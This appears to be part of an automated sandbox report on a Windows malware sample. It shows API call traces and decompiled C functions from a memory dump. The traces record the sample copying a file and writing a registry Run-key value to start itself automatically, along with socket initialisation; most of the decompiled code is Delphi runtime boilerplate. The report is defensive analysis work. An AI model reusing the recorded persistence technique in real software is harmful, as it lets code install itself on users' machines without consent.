      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004019B0() {
    				void* _t11;
    				signed int _t13;
    				intOrPtr _t19;
    				void* _t20;
    				intOrPtr _t23;
    
    				_push(_t23);
    				_push(E00401A66);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t23;
    				_push(0x4545c4);
    				L00401304();
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L0040130C();
    				}
    				E00401374(0x4545e4);
    				E00401374(0x4545f4);
    				E00401374(0x454620);
    				_t11 = LocalAlloc(0, 0xff8); // executed
    				 *0x45461c = _t11;
    				if( *0x45461c != 0) {
    					_t13 = 3;
    					do {
    						_t20 =  *0x45461c; // 0x0
    						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
    						_t13 = _t13 + 1;
    					} while (_t13 != 0x401);
    					 *((intOrPtr*)(0x454608)) = 0x454604;
    					 *0x454604 = 0x454604;
    					 *0x454610 = 0x454604;
    					 *0x4545bc = 1;
    				}
    				_pop(_t19);
    				 *[fs:eax] = _t19;
    				_push(E00401A6D);
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L00401314();
    					return 0;
    				}
    				return 0;
    			}









    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
    				void* _t3;
    
    				_push(0x454880);
    				_push(0x101); // executed
    				L0040C510(); // executed
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSAStartup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}





    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D1C() {
    				struct HINSTANCE__* _t24;
    				void* _t32;
    				intOrPtr _t35;
    				void* _t45;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L3:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t32);
    						 *0x419004 = 0;
    					}
    					L5:
    					while(1) {
    						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    							 *0x0045463C = 0;
    						}
    						E00403AB8();
    						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    							_t14 =  *0x00454640;
    							if( *0x00454640 != 0) {
    								E0040532C(_t14);
    								_t35 =  *((intOrPtr*)(0x454640));
    								_t7 = _t35 + 0x10; // 0x400000
    								_t24 =  *_t7;
    								_t8 = _t35 + 4; // 0x400000
    								if(_t24 !=  *_t8 && _t24 != 0) {
    									FreeLibrary(_t24);
    								}
    							}
    						}
    						E00403A90();
    						if( *((char*)(0x454658)) == 1) {
    							 *0x00454654();
    						}
    						if( *((char*)(0x454658)) != 0) {
    							E00403C60();
    						}
    						if( *0x454630 == 0) {
    							if( *0x454024 != 0) {
    								 *0x454024();
    							}
    							ExitProcess( *0x419000); // executed
    						}
    						memcpy(0x454630,  *0x454630, 0xb << 2);
    						_t45 = _t45 + 0xc;
    						0x419000 = 0x419000;
    					}
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L3;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D18() {
    				struct HINSTANCE__* _t26;
    				void* _t35;
    				intOrPtr _t38;
    				void* _t51;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L4:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t35);
    						 *0x419004 = 0;
    					}
    					L6:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t16 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t16);
    							_t38 =  *((intOrPtr*)(0x454640));
    							_t7 = _t38 + 0x10; // 0x400000
    							_t26 =  *_t7;
    							_t8 = _t38 + 4; // 0x400000
    							if(_t26 !=  *_t8 && _t26 != 0) {
    								FreeLibrary(_t26);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t51 = _t51 + 0xc;
    					0x419000 = 0x419000;
    					goto L6;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L4;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
    				char _v272;
    				intOrPtr _t14;
    				void* _t16;
    				intOrPtr _t18;
    				intOrPtr _t19;
    
    				_t16 = __eax;
    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
    					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
    					_t14 = E00404FC0(_t19); // executed
    					_t18 = _t14;
    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
    					if(_t18 == 0) {
    						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
    					}
    				}
    				return  *((intOrPtr*)(_t16 + 0x10));
    			}









    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
    				void* _t3;
    				void* _t6;
    
    				if(__eax <= 0) {
    					_t6 = 0;
    				} else {
    					_t3 =  *0x41903c(); // executed
    					_t6 = _t3;
    					if(_t6 == 0) {
    						E00402778(1);
    					}
    				}
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
    				void* _t6;
    				intOrPtr _t7;
    
    				_t7 = __edx;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454638 = __eax;
    				 *0x45463c = 0;
    				 *0x454640 = __edx;
    				_t1 = _t7 + 4; // 0x400000
    				 *0x45402c =  *_t1;
    				E00403A70();
    				 *0x454034 = 0; // executed
    				_t6 = E00403B18(); // executed
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000018.00000002.1577217534.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_24_2_400000_obtG43AWHP.jbxd

    Non-executed Functions